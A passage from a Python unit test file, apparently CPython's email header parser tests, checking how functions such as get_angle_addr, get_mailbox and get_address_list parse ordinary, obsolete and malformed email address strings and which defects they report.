self.assertEqual(angle_addr.addr_spec, '"Fred Perfect"@[127.0.0.1]')
def test_get_angle_addr_internal_cfws(self):
angle_addr = self._test_get_x(parser.get_angle_addr,
'<(foo) dinsdale@example.com(bar)>',
'<(foo) dinsdale@example.com(bar)>',
'< dinsdale@example.com >',
[],
'')
self.assertEqual(angle_addr.local_part, 'dinsdale')
self.assertEqual(angle_addr.domain, 'example.com')
self.assertIsNone(angle_addr.route)
self.assertEqual(angle_addr.addr_spec, 'dinsdale@example.com')
def test_get_angle_addr_obs_route(self):
angle_addr = self._test_get_x(parser.get_angle_addr,
'(foo)<@example.com, (bird) @two.example.com: dinsdale@example.com> (bar) ',
'(foo)<@example.com, (bird) @two.example.com: dinsdale@example.com> (bar) ',
' <@example.com, @two.example.com: dinsdale@example.com> ',
[errors.ObsoleteHeaderDefect],
'')
self.assertEqual(angle_addr.local_part, 'dinsdale')
self.assertEqual(angle_addr.domain, 'example.com')
self.assertEqual(angle_addr.route, ['example.com', 'two.example.com'])
self.assertEqual(angle_addr.addr_spec, 'dinsdale@example.com')
def test_get_angle_addr_missing_closing_angle(self):
angle_addr = self._test_get_x(parser.get_angle_addr,
'<dinsdale@example.com',
'<dinsdale@example.com>',
'<dinsdale@example.com>',
[errors.InvalidHeaderDefect],
'')
self.assertEqual(angle_addr.local_part, 'dinsdale')
self.assertEqual(angle_addr.domain, 'example.com')
self.assertIsNone(angle_addr.route)
self.assertEqual(angle_addr.addr_spec, 'dinsdale@example.com')
def test_get_angle_addr_missing_closing_angle_with_cfws(self):
angle_addr = self._test_get_x(parser.get_angle_addr,
'<dinsdale@example.com (foo)',
'<dinsdale@example.com (foo)>',
'<dinsdale@example.com >',
[errors.InvalidHeaderDefect],
'')
self.assertEqual(angle_addr.local_part, 'dinsdale')
self.assertEqual(angle_addr.domain, 'example.com')
self.assertIsNone(angle_addr.route)
self.assertEqual(angle_addr.addr_spec, 'dinsdale@example.com')
def test_get_angle_addr_ends_at_special(self):
angle_addr = self._test_get_x(parser.get_angle_addr,
'<dinsdale@example.com> (foo), next',
'<dinsdale@example.com> (foo)',
'<dinsdale@example.com> ',
[],
', next')
self.assertEqual(angle_addr.local_part, 'dinsdale')
self.assertEqual(angle_addr.domain, 'example.com')
self.assertIsNone(angle_addr.route)
self.assertEqual(angle_addr.addr_spec, 'dinsdale@example.com')
def test_get_angle_addr_no_angle_raise(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_angle_addr('(foo) ')
def test_get_angle_addr_no_angle_before_special_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_angle_addr('(foo) , next')
def test_get_angle_addr_no_angle_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_angle_addr('bar')
def test_get_angle_addr_special_after_angle_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_angle_addr('(foo) <, bar')
# get_display_name This is phrase but with a different value.
def test_get_display_name_simple(self):
display_name = self._test_get_x(parser.get_display_name,
'Fred A Johnson',
'Fred A Johnson',
'Fred A Johnson',
[],
'')
self.assertEqual(display_name.token_type, 'display-name')
self.assertEqual(display_name.display_name, 'Fred A Johnson')
def test_get_display_name_complex1(self):
display_name = self._test_get_x(parser.get_display_name,
'"Fred A. Johnson" is his name, oh.',
'"Fred A. Johnson" is his name',
'"Fred A. Johnson is his name"',
[],
', oh.')
self.assertEqual(display_name.token_type, 'display-name')
self.assertEqual(display_name.display_name, 'Fred A. Johnson is his name')
def test_get_display_name_complex2(self):
display_name = self._test_get_x(parser.get_display_name,
' (A) bird (in (my|your)) "hand " is messy\t<>\t',
' (A) bird (in (my|your)) "hand " is messy\t',
' "bird hand is messy" ',
[],
'<>\t')
self.assertEqual(display_name[0][0].comments, ['A'])
self.assertEqual(display_name[0][2].comments, ['in (my|your)'])
self.assertEqual(display_name.display_name, 'bird hand is messy')
def test_get_display_name_obsolete(self):
display_name = self._test_get_x(parser.get_display_name,
'Fred A.(weird).O Johnson',
'Fred A.(weird).O Johnson',
'"Fred A. .O Johnson"',
[errors.ObsoleteHeaderDefect]*3,
'')
self.assertEqual(len(display_name), 7)
self.assertEqual(display_name[3].comments, ['weird'])
self.assertEqual(display_name.display_name, 'Fred A. .O Johnson')
def test_get_display_name_pharse_must_start_with_word(self):
display_name = self._test_get_x(parser.get_display_name,
'(even weirder).name',
'(even weirder).name',
' ".name"',
[errors.InvalidHeaderDefect] + [errors.ObsoleteHeaderDefect]*2,
'')
self.assertEqual(len(display_name), 3)
self.assertEqual(display_name[0].comments, ['even weirder'])
self.assertEqual(display_name.display_name, '.name')
def test_get_display_name_ending_with_obsolete(self):
display_name = self._test_get_x(parser.get_display_name,
'simple phrase.(with trailing comment):boo',
'simple phrase.(with trailing comment)',
'"simple phrase." ',
[errors.ObsoleteHeaderDefect]*2,
':boo')
self.assertEqual(len(display_name), 4)
self.assertEqual(display_name[3].comments, ['with trailing comment'])
self.assertEqual(display_name.display_name, 'simple phrase.')
# get_name_addr
def test_get_name_addr_angle_addr_only(self):
name_addr = self._test_get_x(parser.get_name_addr,
'<dinsdale@example.com>',
'<dinsdale@example.com>',
'<dinsdale@example.com>',
[],
'')
self.assertEqual(name_addr.token_type, 'name-addr')
self.assertIsNone(name_addr.display_name)
self.assertEqual(name_addr.local_part, 'dinsdale')
self.assertEqual(name_addr.domain, 'example.com')
self.assertIsNone(name_addr.route)
self.assertEqual(name_addr.addr_spec, 'dinsdale@example.com')
def test_get_name_addr_atom_name(self):
name_addr = self._test_get_x(parser.get_name_addr,
'Dinsdale <dinsdale@example.com>',
'Dinsdale <dinsdale@example.com>',
'Dinsdale <dinsdale@example.com>',
[],
'')
self.assertEqual(name_addr.token_type, 'name-addr')
self.assertEqual(name_addr.display_name, 'Dinsdale')
self.assertEqual(name_addr.local_part, 'dinsdale')
self.assertEqual(name_addr.domain, 'example.com')
self.assertIsNone(name_addr.route)
self.assertEqual(name_addr.addr_spec, 'dinsdale@example.com')
def test_get_name_addr_atom_name_with_cfws(self):
name_addr = self._test_get_x(parser.get_name_addr,
'(foo) Dinsdale (bar) <dinsdale@example.com> (bird)',
'(foo) Dinsdale (bar) <dinsdale@example.com> (bird)',
' Dinsdale <dinsdale@example.com> ',
[],
'')
self.assertEqual(name_addr.display_name, 'Dinsdale')
self.assertEqual(name_addr.local_part, 'dinsdale')
self.assertEqual(name_addr.domain, 'example.com')
self.assertIsNone(name_addr.route)
self.assertEqual(name_addr.addr_spec, 'dinsdale@example.com')
def test_get_name_addr_name_with_cfws_and_dots(self):
name_addr = self._test_get_x(parser.get_name_addr,
'(foo) Roy.A.Bear (bar) <dinsdale@example.com> (bird)',
'(foo) Roy.A.Bear (bar) <dinsdale@example.com> (bird)',
' "Roy.A.Bear" <dinsdale@example.com> ',
[errors.ObsoleteHeaderDefect]*2,
'')
self.assertEqual(name_addr.display_name, 'Roy.A.Bear')
self.assertEqual(name_addr.local_part, 'dinsdale')
self.assertEqual(name_addr.domain, 'example.com')
self.assertIsNone(name_addr.route)
self.assertEqual(name_addr.addr_spec, 'dinsdale@example.com')
def test_get_name_addr_qs_name(self):
name_addr = self._test_get_x(parser.get_name_addr,
'"Roy.A.Bear" <dinsdale@example.com>',
'"Roy.A.Bear" <dinsdale@example.com>',
'"Roy.A.Bear" <dinsdale@example.com>',
[],
'')
self.assertEqual(name_addr.display_name, 'Roy.A.Bear')
self.assertEqual(name_addr.local_part, 'dinsdale')
self.assertEqual(name_addr.domain, 'example.com')
self.assertIsNone(name_addr.route)
self.assertEqual(name_addr.addr_spec, 'dinsdale@example.com')
def test_get_name_addr_with_route(self):
name_addr = self._test_get_x(parser.get_name_addr,
'"Roy.A.Bear" <@two.example.com: dinsdale@example.com>',
'"Roy.A.Bear" <@two.example.com: dinsdale@example.com>',
'"Roy.A.Bear" <@two.example.com: dinsdale@example.com>',
[errors.ObsoleteHeaderDefect],
'')
self.assertEqual(name_addr.display_name, 'Roy.A.Bear')
self.assertEqual(name_addr.local_part, 'dinsdale')
self.assertEqual(name_addr.domain, 'example.com')
self.assertEqual(name_addr.route, ['two.example.com'])
self.assertEqual(name_addr.addr_spec, 'dinsdale@example.com')
def test_get_name_addr_ends_at_special(self):
name_addr = self._test_get_x(parser.get_name_addr,
'"Roy.A.Bear" <dinsdale@example.com>, next',
'"Roy.A.Bear" <dinsdale@example.com>',
'"Roy.A.Bear" <dinsdale@example.com>',
[],
', next')
self.assertEqual(name_addr.display_name, 'Roy.A.Bear')
self.assertEqual(name_addr.local_part, 'dinsdale')
self.assertEqual(name_addr.domain, 'example.com')
self.assertIsNone(name_addr.route)
self.assertEqual(name_addr.addr_spec, 'dinsdale@example.com')
def test_get_name_addr_no_content_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_name_addr(' (foo) ')
def test_get_name_addr_no_content_before_special_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_name_addr(' (foo) ,')
def test_get_name_addr_no_angle_after_display_name_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_name_addr('foo bar')
# get_mailbox
def test_get_mailbox_addr_spec_only(self):
mailbox = self._test_get_x(parser.get_mailbox,
'dinsdale@example.com',
'dinsdale@example.com',
'dinsdale@example.com',
[],
'')
self.assertEqual(mailbox.token_type, 'mailbox')
self.assertIsNone(mailbox.display_name)
self.assertEqual(mailbox.local_part, 'dinsdale')
self.assertEqual(mailbox.domain, 'example.com')
self.assertIsNone(mailbox.route)
self.assertEqual(mailbox.addr_spec, 'dinsdale@example.com')
def test_get_mailbox_angle_addr_only(self):
mailbox = self._test_get_x(parser.get_mailbox,
'<dinsdale@example.com>',
'<dinsdale@example.com>',
'<dinsdale@example.com>',
[],
'')
self.assertEqual(mailbox.token_type, 'mailbox')
self.assertIsNone(mailbox.display_name)
self.assertEqual(mailbox.local_part, 'dinsdale')
self.assertEqual(mailbox.domain, 'example.com')
self.assertIsNone(mailbox.route)
self.assertEqual(mailbox.addr_spec, 'dinsdale@example.com')
def test_get_mailbox_name_addr(self):
mailbox = self._test_get_x(parser.get_mailbox,
'"Roy A. Bear" <dinsdale@example.com>',
'"Roy A. Bear" <dinsdale@example.com>',
'"Roy A. Bear" <dinsdale@example.com>',
[],
'')
self.assertEqual(mailbox.token_type, 'mailbox')
self.assertEqual(mailbox.display_name, 'Roy A. Bear')
self.assertEqual(mailbox.local_part, 'dinsdale')
self.assertEqual(mailbox.domain, 'example.com')
self.assertIsNone(mailbox.route)
self.assertEqual(mailbox.addr_spec, 'dinsdale@example.com')
def test_get_mailbox_ends_at_special(self):
mailbox = self._test_get_x(parser.get_mailbox,
'"Roy A. Bear" <dinsdale@example.com>, rest',
'"Roy A. Bear" <dinsdale@example.com>',
'"Roy A. Bear" <dinsdale@example.com>',
[],
', rest')
self.assertEqual(mailbox.token_type, 'mailbox')
self.assertEqual(mailbox.display_name, 'Roy A. Bear')
self.assertEqual(mailbox.local_part, 'dinsdale')
self.assertEqual(mailbox.domain, 'example.com')
self.assertIsNone(mailbox.route)
self.assertEqual(mailbox.addr_spec, 'dinsdale@example.com')
def test_get_mailbox_quoted_strings_in_atom_list(self):
mailbox = self._test_get_x(parser.get_mailbox,
'""example" example"@example.com',
'""example" example"@example.com',
'example example@example.com',
[errors.InvalidHeaderDefect]*3,
'')
self.assertEqual(mailbox.local_part, 'example example')
self.assertEqual(mailbox.domain, 'example.com')
self.assertEqual(mailbox.addr_spec, '"example example"@example.com')
# get_mailbox_list
def test_get_mailbox_list_single_addr(self):
mailbox_list = self._test_get_x(parser.get_mailbox_list,
'dinsdale@example.com',
'dinsdale@example.com',
'dinsdale@example.com',
[],
'')
self.assertEqual(mailbox_list.token_type, 'mailbox-list')
self.assertEqual(len(mailbox_list.mailboxes), 1)
mailbox = mailbox_list.mailboxes[0]
self.assertIsNone(mailbox.display_name)
self.assertEqual(mailbox.local_part, 'dinsdale')
self.assertEqual(mailbox.domain, 'example.com')
self.assertIsNone(mailbox.route)
self.assertEqual(mailbox.addr_spec, 'dinsdale@example.com')
self.assertEqual(mailbox_list.mailboxes,
mailbox_list.all_mailboxes)
def test_get_mailbox_list_two_simple_addr(self):
mailbox_list = self._test_get_x(parser.get_mailbox_list,
'dinsdale@example.com, dinsdale@test.example.com',
'dinsdale@example.com, dinsdale@test.example.com',
'dinsdale@example.com, dinsdale@test.example.com',
[],
'')
self.assertEqual(mailbox_list.token_type, 'mailbox-list')
self.assertEqual(len(mailbox_list.mailboxes), 2)
self.assertEqual(mailbox_list.mailboxes[0].addr_spec,
'dinsdale@example.com')
self.assertEqual(mailbox_list.mailboxes[1].addr_spec,
'dinsdale@test.example.com')
self.assertEqual(mailbox_list.mailboxes,
mailbox_list.all_mailboxes)
def test_get_mailbox_list_two_name_addr(self):
mailbox_list = self._test_get_x(parser.get_mailbox_list,
('"Roy A. Bear" <dinsdale@example.com>,'
' "Fred Flintstone" <dinsdale@test.example.com>'),
('"Roy A. Bear" <dinsdale@example.com>,'
' "Fred Flintstone" <dinsdale@test.example.com>'),
('"Roy A. Bear" <dinsdale@example.com>,'
' "Fred Flintstone" <dinsdale@test.example.com>'),
[],
'')
self.assertEqual(len(mailbox_list.mailboxes), 2)
self.assertEqual(mailbox_list.mailboxes[0].addr_spec,
'dinsdale@example.com')
self.assertEqual(mailbox_list.mailboxes[0].display_name,
'Roy A. Bear')
self.assertEqual(mailbox_list.mailboxes[1].addr_spec,
'dinsdale@test.example.com')
self.assertEqual(mailbox_list.mailboxes[1].display_name,
'Fred Flintstone')
self.assertEqual(mailbox_list.mailboxes,
mailbox_list.all_mailboxes)
def test_get_mailbox_list_two_complex(self):
mailbox_list = self._test_get_x(parser.get_mailbox_list,
('(foo) "Roy A. Bear" <dinsdale@example.com>(bar),'
' "Fred Flintstone" <dinsdale@test.(bird)example.com>'),
('(foo) "Roy A. Bear" <dinsdale@example.com>(bar),'
' "Fred Flintstone" <dinsdale@test.(bird)example.com>'),
(' "Roy A. Bear" <dinsdale@example.com> ,'
' "Fred Flintstone" <dinsdale@test. example.com>'),
[errors.ObsoleteHeaderDefect],
'')
self.assertEqual(len(mailbox_list.mailboxes), 2)
self.assertEqual(mailbox_list.mailboxes[0].addr_spec,
'dinsdale@example.com')
self.assertEqual(mailbox_list.mailboxes[0].display_name,
'Roy A. Bear')
self.assertEqual(mailbox_list.mailboxes[1].addr_spec,
'dinsdale@test.example.com')
self.assertEqual(mailbox_list.mailboxes[1].display_name,
'Fred Flintstone')
self.assertEqual(mailbox_list.mailboxes,
mailbox_list.all_mailboxes)
def test_get_mailbox_list_unparseable_mailbox_null(self):
mailbox_list = self._test_get_x(parser.get_mailbox_list,
('"Roy A. Bear"[] dinsdale@example.com,'
' "Fred Flintstone" <dinsdale@test.(bird)example.com>'),
('"Roy A. Bear"[] dinsdale@example.com,'
' "Fred Flintstone" <dinsdale@test.(bird)example.com>'),
('"Roy A. Bear"[] dinsdale@example.com,'
' "Fred Flintstone" <dinsdale@test. example.com>'),
[errors.InvalidHeaderDefect, # the 'extra' text after the local part
errors.InvalidHeaderDefect, # the local part with no angle-addr
errors.ObsoleteHeaderDefect, # period in extra text (example.com)
errors.ObsoleteHeaderDefect], # (bird) in valid address.
'')
self.assertEqual(len(mailbox_list.mailboxes), 1)
self.assertEqual(len(mailbox_list.all_mailboxes), 2)
self.assertEqual(mailbox_list.all_mailboxes[0].token_type,
'invalid-mailbox')
self.assertIsNone(mailbox_list.all_mailboxes[0].display_name)
self.assertEqual(mailbox_list.all_mailboxes[0].local_part,
'Roy A. Bear')
self.assertIsNone(mailbox_list.all_mailboxes[0].domain)
self.assertEqual(mailbox_list.all_mailboxes[0].addr_spec,
'"Roy A. Bear"')
self.assertIs(mailbox_list.all_mailboxes[1],
mailbox_list.mailboxes[0])
self.assertEqual(mailbox_list.mailboxes[0].addr_spec,
'dinsdale@test.example.com')
self.assertEqual(mailbox_list.mailboxes[0].display_name,
'Fred Flintstone')
def test_get_mailbox_list_junk_after_valid_address(self):
mailbox_list = self._test_get_x(parser.get_mailbox_list,
('"Roy A. Bear" <dinsdale@example.com>@@,'
' "Fred Flintstone" <dinsdale@test.example.com>'),
('"Roy A. Bear" <dinsdale@example.com>@@,'
' "Fred Flintstone" <dinsdale@test.example.com>'),
('"Roy A. Bear" <dinsdale@example.com>@@,'
' "Fred Flintstone" <dinsdale@test.example.com>'),
[errors.InvalidHeaderDefect],
'')
self.assertEqual(len(mailbox_list.mailboxes), 1)
self.assertEqual(len(mailbox_list.all_mailboxes), 2)
self.assertEqual(mailbox_list.all_mailboxes[0].addr_spec,
'dinsdale@example.com')
self.assertEqual(mailbox_list.all_mailboxes[0].display_name,
'Roy A. Bear')
self.assertEqual(mailbox_list.all_mailboxes[0].token_type,
'invalid-mailbox')
self.assertIs(mailbox_list.all_mailboxes[1],
mailbox_list.mailboxes[0])
self.assertEqual(mailbox_list.mailboxes[0].addr_spec,
'dinsdale@test.example.com')
self.assertEqual(mailbox_list.mailboxes[0].display_name,
'Fred Flintstone')
def test_get_mailbox_list_empty_list_element(self):
mailbox_list = self._test_get_x(parser.get_mailbox_list,
('"Roy A. Bear" <dinsdale@example.com>, (bird),,'
' "Fred Flintstone" <dinsdale@test.example.com>'),
('"Roy A. Bear" <dinsdale@example.com>, (bird),,'
' "Fred Flintstone" <dinsdale@test.example.com>'),
('"Roy A. Bear" <dinsdale@example.com>, ,,'
' "Fred Flintstone" <dinsdale@test.example.com>'),
[errors.ObsoleteHeaderDefect]*2,
'')
self.assertEqual(len(mailbox_list.mailboxes), 2)
self.assertEqual(mailbox_list.all_mailboxes,
mailbox_list.mailboxes)
self.assertEqual(mailbox_list.all_mailboxes[0].addr_spec,
'dinsdale@example.com')
self.assertEqual(mailbox_list.all_mailboxes[0].display_name,
'Roy A. Bear')
self.assertEqual(mailbox_list.mailboxes[1].addr_spec,
'dinsdale@test.example.com')
self.assertEqual(mailbox_list.mailboxes[1].display_name,
'Fred Flintstone')
def test_get_mailbox_list_only_empty_elements(self):
mailbox_list = self._test_get_x(parser.get_mailbox_list,
'(foo),, (bar)',
'(foo),, (bar)',
' ,, ',
[errors.ObsoleteHeaderDefect]*3,
'')
self.assertEqual(len(mailbox_list.mailboxes), 0)
self.assertEqual(mailbox_list.all_mailboxes,
mailbox_list.mailboxes)
# get_group_list
def test_get_group_list_cfws_only(self):
group_list = self._test_get_x(parser.get_group_list,
'(hidden);',
'(hidden)',
' ',
[],
';')
self.assertEqual(group_list.token_type, 'group-list')
self.assertEqual(len(group_list.mailboxes), 0)
self.assertEqual(group_list.mailboxes,
group_list.all_mailboxes)
def test_get_group_list_mailbox_list(self):
group_list = self._test_get_x(parser.get_group_list,
'dinsdale@example.org, "Fred A. Bear" <dinsdale@example.org>',
'dinsdale@example.org, "Fred A. Bear" <dinsdale@example.org>',
'dinsdale@example.org, "Fred A. Bear" <dinsdale@example.org>',
[],
'')
self.assertEqual(group_list.token_type, 'group-list')
self.assertEqual(len(group_list.mailboxes), 2)
self.assertEqual(group_list.mailboxes,
group_list.all_mailboxes)
self.assertEqual(group_list.mailboxes[1].display_name,
'Fred A. Bear')
def test_get_group_list_obs_group_list(self):
group_list = self._test_get_x(parser.get_group_list,
', (foo),,(bar)',
', (foo),,(bar)',
', ,, ',
[errors.ObsoleteHeaderDefect],
'')
self.assertEqual(group_list.token_type, 'group-list')
self.assertEqual(len(group_list.mailboxes), 0)
self.assertEqual(group_list.mailboxes,
group_list.all_mailboxes)
def test_get_group_list_comment_only_invalid(self):
group_list = self._test_get_x(parser.get_group_list,
'(bar)',
'(bar)',
' ',
[errors.InvalidHeaderDefect],
'')
self.assertEqual(group_list.token_type, 'group-list')
self.assertEqual(len(group_list.mailboxes), 0)
self.assertEqual(group_list.mailboxes,
group_list.all_mailboxes)
# get_group
def test_get_group_empty(self):
group = self._test_get_x(parser.get_group,
'Monty Python:;',
'Monty Python:;',
'Monty Python:;',
[],
'')
self.assertEqual(group.token_type, 'group')
self.assertEqual(group.display_name, 'Monty Python')
self.assertEqual(len(group.mailboxes), 0)
self.assertEqual(group.mailboxes,
group.all_mailboxes)
def test_get_group_null_addr_spec(self):
group = self._test_get_x(parser.get_group,
'foo: <>;',
'foo: <>;',
'foo: <>;',
[errors.InvalidHeaderDefect],
'')
self.assertEqual(group.display_name, 'foo')
self.assertEqual(len(group.mailboxes), 0)
self.assertEqual(len(group.all_mailboxes), 1)
self.assertEqual(group.all_mailboxes[0].value, '<>')
def test_get_group_cfws_only(self):
group = self._test_get_x(parser.get_group,
'Monty Python: (hidden);',
'Monty Python: (hidden);',
'Monty Python: ;',
[],
'')
self.assertEqual(group.token_type, 'group')
self.assertEqual(group.display_name, 'Monty Python')
self.assertEqual(len(group.mailboxes), 0)
self.assertEqual(group.mailboxes,
group.all_mailboxes)
def test_get_group_single_mailbox(self):
group = self._test_get_x(parser.get_group,
'Monty Python: "Fred A. Bear" <dinsdale@example.com>;',
'Monty Python: "Fred A. Bear" <dinsdale@example.com>;',
'Monty Python: "Fred A. Bear" <dinsdale@example.com>;',
[],
'')
self.assertEqual(group.token_type, 'group')
self.assertEqual(group.display_name, 'Monty Python')
self.assertEqual(len(group.mailboxes), 1)
self.assertEqual(group.mailboxes,
group.all_mailboxes)
self.assertEqual(group.mailboxes[0].addr_spec,
'dinsdale@example.com')
def test_get_group_mixed_list(self):
group = self._test_get_x(parser.get_group,
('Monty Python: "Fred A. Bear" <dinsdale@example.com>,'
'(foo) Roger <ping@exampele.com>, x@test.example.com;'),
('Monty Python: "Fred A. Bear" <dinsdale@example.com>,'
'(foo) Roger <ping@exampele.com>, x@test.example.com;'),
('Monty Python: "Fred A. Bear" <dinsdale@example.com>,'
' Roger <ping@exampele.com>, x@test.example.com;'),
[],
'')
self.assertEqual(group.token_type, 'group')
self.assertEqual(group.display_name, 'Monty Python')
self.assertEqual(len(group.mailboxes), 3)
self.assertEqual(group.mailboxes,
group.all_mailboxes)
self.assertEqual(group.mailboxes[0].display_name,
'Fred A. Bear')
self.assertEqual(group.mailboxes[1].display_name,
'Roger')
self.assertEqual(group.mailboxes[2].local_part, 'x')
def test_get_group_one_invalid(self):
group = self._test_get_x(parser.get_group,
('Monty Python: "Fred A. Bear" <dinsdale@example.com>,'
'(foo) Roger ping@exampele.com, x@test.example.com;'),
('Monty Python: "Fred A. Bear" <dinsdale@example.com>,'
'(foo) Roger ping@exampele.com, x@test.example.com;'),
('Monty Python: "Fred A. Bear" <dinsdale@example.com>,'
' Roger ping@exampele.com, x@test.example.com;'),
[errors.InvalidHeaderDefect, # non-angle addr makes local part invalid
errors.InvalidHeaderDefect], # and its not obs-local either: no dots.
'')
self.assertEqual(group.token_type, 'group')
self.assertEqual(group.display_name, 'Monty Python')
self.assertEqual(len(group.mailboxes), 2)
self.assertEqual(len(group.all_mailboxes), 3)
self.assertEqual(group.mailboxes[0].display_name,
'Fred A. Bear')
self.assertEqual(group.mailboxes[1].local_part, 'x')
self.assertIsNone(group.all_mailboxes[1].display_name)
# get_address
def test_get_address_simple(self):
address = self._test_get_x(parser.get_address,
'dinsdale@example.com',
'dinsdale@example.com',
'dinsdale@example.com',
[],
'')
self.assertEqual(address.token_type, 'address')
self.assertEqual(len(address.mailboxes), 1)
self.assertEqual(address.mailboxes,
address.all_mailboxes)
self.assertEqual(address.mailboxes[0].domain,
'example.com')
self.assertEqual(address[0].token_type,
'mailbox')
def test_get_address_complex(self):
address = self._test_get_x(parser.get_address,
'(foo) "Fred A. Bear" <(bird)dinsdale@example.com>',
'(foo) "Fred A. Bear" <(bird)dinsdale@example.com>',
' "Fred A. Bear" < dinsdale@example.com>',
[],
'')
self.assertEqual(address.token_type, 'address')
self.assertEqual(len(address.mailboxes), 1)
self.assertEqual(address.mailboxes,
address.all_mailboxes)
self.assertEqual(address.mailboxes[0].display_name,
'Fred A. Bear')
self.assertEqual(address[0].token_type,
'mailbox')
def test_get_address_rfc2047_display_name(self):
address = self._test_get_x(parser.get_address,
'=?utf-8?q?=C3=89ric?= <foo@example.com>',
'Éric <foo@example.com>',
'Éric <foo@example.com>',
[],
'')
self.assertEqual(address.token_type, 'address')
self.assertEqual(len(address.mailboxes), 1)
self.assertEqual(address.mailboxes,
address.all_mailboxes)
self.assertEqual(address.mailboxes[0].display_name,
'Éric')
self.assertEqual(address[0].token_type,
'mailbox')
def test_get_address_empty_group(self):
address = self._test_get_x(parser.get_address,
'Monty Python:;',
'Monty Python:;',
'Monty Python:;',
[],
'')
self.assertEqual(address.token_type, 'address')
self.assertEqual(len(address.mailboxes), 0)
self.assertEqual(address.mailboxes,
address.all_mailboxes)
self.assertEqual(address[0].token_type,
'group')
self.assertEqual(address[0].display_name,
'Monty Python')
def test_get_address_group(self):
address = self._test_get_x(parser.get_address,
'Monty Python: x@example.com, y@example.com;',
'Monty Python: x@example.com, y@example.com;',
'Monty Python: x@example.com, y@example.com;',
[],
'')
self.assertEqual(address.token_type, 'address')
self.assertEqual(len(address.mailboxes), 2)
self.assertEqual(address.mailboxes,
address.all_mailboxes)
self.assertEqual(address[0].token_type,
'group')
self.assertEqual(address[0].display_name,
'Monty Python')
self.assertEqual(address.mailboxes[0].local_part, 'x')
def test_get_address_quoted_local_part(self):
address = self._test_get_x(parser.get_address,
'"foo bar"@example.com',
'"foo bar"@example.com',
'"foo bar"@example.com',
[],
'')
self.assertEqual(address.token_type, 'address')
self.assertEqual(len(address.mailboxes), 1)
self.assertEqual(address.mailboxes,
address.all_mailboxes)
self.assertEqual(address.mailboxes[0].domain,
'example.com')
self.assertEqual(address.mailboxes[0].local_part,
'foo bar')
self.assertEqual(address[0].token_type, 'mailbox')
def test_get_address_ends_at_special(self):
address = self._test_get_x(parser.get_address,
'dinsdale@example.com, next',
'dinsdale@example.com',
'dinsdale@example.com',
[],
', next')
self.assertEqual(address.token_type, 'address')
self.assertEqual(len(address.mailboxes), 1)
self.assertEqual(address.mailboxes,
address.all_mailboxes)
self.assertEqual(address.mailboxes[0].domain,
'example.com')
self.assertEqual(address[0].token_type, 'mailbox')
def test_get_address_invalid_mailbox_invalid(self):
address = self._test_get_x(parser.get_address,
'ping example.com, next',
'ping example.com',
'ping example.com',
[errors.InvalidHeaderDefect, # addr-spec with no domain
errors.InvalidHeaderDefect, # invalid local-part
errors.InvalidHeaderDefect, # missing .s in local-part
],
', next')
self.assertEqual(address.token_type, 'address')
self.assertEqual(len(address.mailboxes), 0)
self.assertEqual(len(address.all_mailboxes), 1)
self.assertIsNone(address.all_mailboxes[0].domain)
self.assertEqual(address.all_mailboxes[0].local_part, 'ping example.com')
self.assertEqual(address[0].token_type, 'invalid-mailbox')
def test_get_address_quoted_strings_in_atom_list(self):
address = self._test_get_x(parser.get_address,
'""example" example"@example.com',
'""example" example"@example.com',
'example example@example.com',
[errors.InvalidHeaderDefect]*3,
'')
self.assertEqual(address.all_mailboxes[0].local_part, 'example example')
self.assertEqual(address.all_mailboxes[0].domain, 'example.com')
self.assertEqual(address.all_mailboxes[0].addr_spec, '"example example"@example.com')
# get_address_list
def test_get_address_list_mailboxes_simple(self):
address_list = self._test_get_x(parser.get_address_list,
'dinsdale@example.com',
'dinsdale@example.com',
'dinsdale@example.com',
[],
'')
self.assertEqual(address_list.token_type, 'address-list')
self.assertEqual(len(address_list.mailboxes), 1)
self.assertEqual(address_list.mailboxes,
address_list.all_mailboxes)
self.assertEqual([str(x) for x in address_list.mailboxes],
[str(x) for x in address_list.addresses])
self.assertEqual(address_list.mailboxes[0].domain, 'example.com')
self.assertEqual(address_list[0].token_type, 'address')
self.assertIsNone(address_list[0].display_name)
def test_get_address_list_mailboxes_two_simple(self):
address_list = self._test_get_x(parser.get_address_list,
'foo@example.com, "Fred A. Bar" <bar@example.com>',
'foo@example.com, "Fred A. Bar" <bar@example.com>',
'foo@example.com, "Fred A. Bar" <bar@example.com>',
[],
'')
self.assertEqual(address_list.token_type, 'address-list')
self.assertEqual(len(address_list.mailboxes), 2)
self.assertEqual(address_list.mailboxes,
address_list.all_mailboxes)
self.assertEqual([str(x) for x in address_list.mailboxes],
[str(x) for x in address_list.addresses])
self.assertEqual(address_list.mailboxes[0].local_part, 'foo')
self.assertEqual(address_list.mailboxes[1].display_name, "Fred A. Bar")
def test_get_address_list_mailboxes_complex(self):
address_list = self._test_get_x(parser.get_address_list,
('"Roy A. Bear" <dinsdale@example.com>, '
'(ping) Foo <x@example.com>,'
'Nobody Is. Special <y@(bird)example.(bad)com>'),
('"Roy A. Bear" <dinsdale@example.com>, '
'(ping) Foo <x@example.com>,'
'Nobody Is. Special <y@(bird)example.(bad)com>'),
('"Roy A. Bear" <dinsdale@example.com>, '
'Foo <x@example.com>,'
'"Nobody Is. Special" <y@example. com>'),
[errors.ObsoleteHeaderDefect, # period in Is.
errors.ObsoleteHeaderDefect], # cfws in domain
'')
self.assertEqual(address_list.token_type, 'address-list')
self.assertEqual(len(address_list.mailboxes), 3)
self.assertEqual(address_list.mailboxes,
address_list.all_mailboxes)
self.assertEqual([str(x) for x in address_list.mailboxes],
[str(x) for x in address_list.addresses])
self.assertEqual(address_list.mailboxes[0].domain, 'example.com')
self.assertEqual(address_list.mailboxes[0].token_type, 'mailbox')
self.assertEqual(address_list.addresses[0].token_type, 'address')
self.assertEqual(address_list.mailboxes[1].local_part, 'x')
self.assertEqual(address_list.mailboxes[2].display_name,
'Nobody Is. Special')
def test_get_address_list_mailboxes_invalid_addresses(self):
address_list = self._test_get_x(parser.get_address_list,
('"Roy A. Bear" <dinsdale@example.com>, '
'(ping) Foo x@example.com[],'
'Nobody Is. Special <(bird)example.(bad)com>'),
('"Roy A. Bear" <dinsdale@example.com>, '
'(ping) Foo x@example.com[],'
'Nobody Is. Special <(bird)example.(bad)com>'),
('"Roy A. Bear" <dinsdale@example.com>, '
